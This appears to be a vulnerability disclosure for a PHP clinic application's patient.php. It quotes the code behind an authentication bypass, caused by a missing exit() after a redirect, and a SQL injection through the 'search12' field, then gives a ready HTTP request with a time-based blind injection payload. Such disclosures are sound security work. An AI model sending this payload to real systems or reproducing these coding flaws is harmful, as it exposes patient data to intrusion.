Found a vulnerability

[0clickjacking0]

Vulnerability file address

patient/patient.php from line 26,the problem is at line 36header("location: ../login.php");,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header like Cookie: PHPSESSID=foo is not passed in http

......
......
......
session_start();

    if(isset($_SESSION["user"])){
        if(($_SESSION["user"])=="" or $_SESSION['usertype']!='d'){
            header("location: ../login.php");
        }else{
            $useremail=$_SESSION["user"];
        }

    }else{
        header("location: ../login.php");
    }
......
......
......

patient/patient.php from line 106,The $keyword parameter is controllable, the parameter search12 can be passed through post, and the $keyword is not protected from sql injection, line 150 $list11 = $database->query($sqlmain); causes sql injection

......
......
......
  if($_POST){

    if(isset($_POST["search"])){
      $keyword=$_POST["search12"];

      $sqlmain= "select * from patient where pemail='$keyword' or pname='$keyword' or pname like '$keyword%' or pname like '%$keyword' or pname like '%$keyword%' ";
      $selecttype="my";
    }


    <?php
      echo '<datalist id="patient">';
    $list11 = $database->query($sqlmain);
......
......
......

POC

POST /patient/patient.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

search=1&search12=' AND (SELECT 3127 FROM (SELECT(SLEEP(2)))PKsU) AND 'rUxx'='rUxx

Attack results pictures